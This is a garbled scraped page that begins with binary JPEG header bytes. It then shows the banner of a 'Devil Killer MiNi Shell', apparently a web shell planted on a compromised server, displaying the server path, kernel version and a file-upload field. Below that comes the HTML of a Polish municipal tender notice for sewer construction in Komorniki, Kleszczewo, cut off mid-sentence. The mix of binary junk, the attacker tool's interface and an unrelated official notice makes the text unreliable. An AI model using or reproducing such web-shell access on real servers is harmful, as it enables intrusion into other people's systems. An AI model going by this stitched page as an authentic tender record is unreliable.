JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211222/0032829401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w Komornikach, gm. Kleszczewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kleszczewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@kleszczewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kleszczewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w Komornikach, gm. Kleszczewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-012862aa-632b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00328294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008811/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa kanalizacji sanitarnej w Komornikiach, gm. Kleszczewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kleszczewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja między<br/>Zamawiającym(Z.) a Wykonawcami(W.),w szcz.składanie<br/>zapytań,oświadczeń,wniosków,zawiadomień, jak rów. przekazywanie inf. odbywa się przy użyciu<br/>Platformy Zakupowej(dalejPZ) adres: https://platformazakupowa.pl/pn/kleszczewo 3.Z.wyznacza do<br/>kontaktu z W: M.Trubłajewicz,tel.618176033w.131, m.trublajewicz@kleszczewo.pl 4.W postępowaniu<br/>komunikacja między Z. a W., w tym złożenie ofert oraz oświadczenia o speł. war. udz.w post.oraz<br/>braku podstaw wykl., odbywa się wył.za pośrednictwem PZ. Z. dopuszcza też możliwość składania<br/>dok. elektr., oświadczeń lub elektr. kopii dok. lub ośw.za pomocą poczty el., na wskazany w pkt 3.<br/>adres email.5.Z.będzie przekazywał W. inform. za pośr. PZ Inform. dot. odpowiedzi na pyt., zmiany<br/>SWZ,zmiany term.skł. i otw.ofert Z.będzie zamieszczał na PZ w sekcji “Komunikaty”.<br/>Korespondencja,której zgodnie z obow. przepisami adresatem jest konkretny w., będzie przekazyw. za pośr. PZ do konkr. w.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Pytania<br/>dotyczące korzystania z Platformy Zakupowej, procesu składania ofert na Platformie Zakupowej,<br/>rejestracji na Platformie Zakupowej czy innych aspektów technicznych związanych z korzystaniem z<br/>Platformy Zakupowej należy kierować do Centrum Wsparcia Klienta dostępnym od poniedziałku do<br/>piątku w godzinach od 08:00 do 17:00 pod numerem tel. 22 101 02 02, e-mail:<br/>cwk@platformazakupowa.pl. 2.Z. nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny<br/>z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Z. zapozna się z<br/>treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość<br/>do zamawiającego”). Taka oferta zostanie uznana przez Z. za ofertę handlową i nie będzie brana pod<br/>uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art.<br/>221 Ustawy Prawo Zamówień Publicznych.3.Z.nie przewiduje sposobu komunikowania się z W.w inny<br/>sposób niż przy użyciu środków komunikacji elektronicznej, wskazanej w SWZ.4Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzenia Ministra Rozwoju z dnia 23 grudnia 2020<br/>roku w sprawie rodzajów podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać z. od w.5.W. jako podmiot prof. ma obowiązek spr. komunikatów i wiadomości bezpośrednio na PZ przesłanych przez Z.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, dalej „RODO”), Zamawiający informuję, że:<br/>a. administratorem Pani/Pana danych osobowych jest Wójt Gminy Kleszczewo z siedzibą w Urzędzie<br/>Gminy Kleszczewu, ul. Poznańska 4 (63-005 Kleszczewo).<br/>b. Inspektorem ochrony danych w Gminie Kleszczewo jest Pani Katarzyna Śliwińska, kontakt na adres<br/>e-mail: iod@kleszczewo.pl<br/>c. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego w niektórych<br/>sytuacjach Zamawiający może przekazywać Pani/Pana dane osobowe osobom trzecim, jeśli będzie to<br/>konieczne do dochodzenia praw i obowiązków wynikających z zawartej umowy lub obowiązujących<br/>przepisów prawa;<br/>d. Pani/Pana dane osobowe będą przekazywane wyłącznie osobom upoważnionym przez<br/>Zamawiającego tj. pracownikom i współpracownikom Zamawiającego, którzy muszą mieć dostęp do<br/>danych, aby wykonywać swoje obowiązki, podmiotom przetwarzającym, którym Zamawiający zleci to<br/>zadanie, innym odbiorcom danych, np. kurierom (placówkom pocztowym), bankom, ubezpieczycielom,<br/>kancelariom prawnym lub instytucjom upoważnionym z mocy prawa do otrzymania przedmiotowych<br/>danych;<br/>e. odbiorcami Pani/Pana danych osobowych będą ponadto osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 roku Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późń. zm.);<br/>f. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy oraz przez okres wykonywania przez<br/>Zamawiającego ciążących na nim obowiązków prawnych, w którym przepisy prawa nakazują<br/>Zamawiającemu przechowywać dane osobowe, w którym Zamawiający może ponieść konsekwencje<br/>prawne niewykonania obowiązków wynikających z przepisów prawa oraz ustalenia, obrony i<br/>dochodzenia roszczeń oraz wierzytelności przez Zamawiającego;<br/>g. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp;<br/>h. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>i. posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , ;<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>j. nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania pn. „Budowa sieci kanalizacji sanitarnej w Komornikach, gm. Kleszczewo” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42122220-8 - Pompy ściekowe</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy pzp do 30% wartości zamówienia na warunkach takich jak wykonanie zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>określone w art. 112 ust. 1 Pzp dotyczące:<br/>a. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie przewiduje określenia warunków udziału w postępowaniu w tym zakresie.<br/>b. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie przewiduje określenia warunków udziału w postępowaniu w tym zakresie.<br/>c. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie przewiduje określenia warunków udziału w postępowaniu w tym zakresie.<br/>d. zdolności technicznej lub zawodowej:<br/>- warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1<br/>robotę budowlaną polegającą na budowie kanalizacji sanitarnej o wartości brutto nie mniejszej<br/>niż 2.800.000 zł brutto<br/>- warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie<br/>dysponował osobami zdolnymi do wykonania zamówienia tj. m.in. odpowiedzialnymi za<br/>kierowanie robotami budowlanymi posiadającymi uprawnienia budowlane w specjalności:<br/>- kierownik robót w branży instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych,<br/>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły „spełnia<br/>– nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych<br/>przez Zamawiającego i podanych w SWZ) dołączonych do oferty.<br/>UWAGA: W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie<br/>niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne<br/>kwalifikacje i doświadczenie.<br/>2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w rozdziale 8 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w Rozdziale 6 SWZ . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b.	w pozostałym zakresie – oświadczenia wykonawcy o braku podstaw wykluczenia go z udziału oraz spełnienia przez niego warunków udziału w postepowaniu (załącznik nr 4 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie zdolności technicznej lub zawodowej:<br/>-W celu wykazania spełnienia przedmiotowego warunku Zamawiający żąda, aby Wykonawca<br/>przedłożył wykaz robót budowlanych wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty – sporządzony według wzoru stanowiącego<br/>Załącznik nr 6 do SWZ.<br/>-w celu wykazania spełnienia przedmiotowego warunku Zamawiający żąda, aby Wykonawca<br/>przedłożył wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami – sporządzony według wzoru stanowiącego Załącznik nr 7<br/>do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> -formularz ofertowy,a. oświadczenia, o których mowa w Rozdziale 6 i 7 SWZ;<br/>b. dowód wniesienia wadium;<br/>c. dokumenty, z których wynika prawo do podpisania oferty;<br/>d. zobowiązanie innego podmiotu, o którym mowa w Rozdziale 7 SWZ, w tym oświadczenie o<br/>nie podleganiu wykluczeniu i spełnieniu warunków udziału w postepowaniu takiego podmiotu<br/>(jeżeli dotyczy);<br/>e. odpowiednie pełnomocnictwa (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.1. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium wysokości<br/>40.000,00 złotych.<br/>1.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 p.z.p .<br/>1.3. Wadium może być wniesione w następujących formach:<br/>a. pieniądzu;<br/>b. gwarancjach bankowych;<br/>c. gwarancjach ubezpieczeniowych;<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 roku, poz. 310, 836 i 1572).<br/>1.4. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna<br/>być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br/>a. nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta<br/>(banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>b. określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>c. kwotę gwarancji,<br/>d. termin ważności gwarancji,<br/>e. zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie<br/>Zamawiającego musi obejmować sytuację, o których mowa w art. 98 ust. 6 Pzp<br/>f. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp),<br/>Zamawiający wymaga aby gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu<br/>poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>g. termin obowiązywania gwarancji nie może być krótszy niż termin związania ofertą (z<br/>zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>h. w treści gwarancji 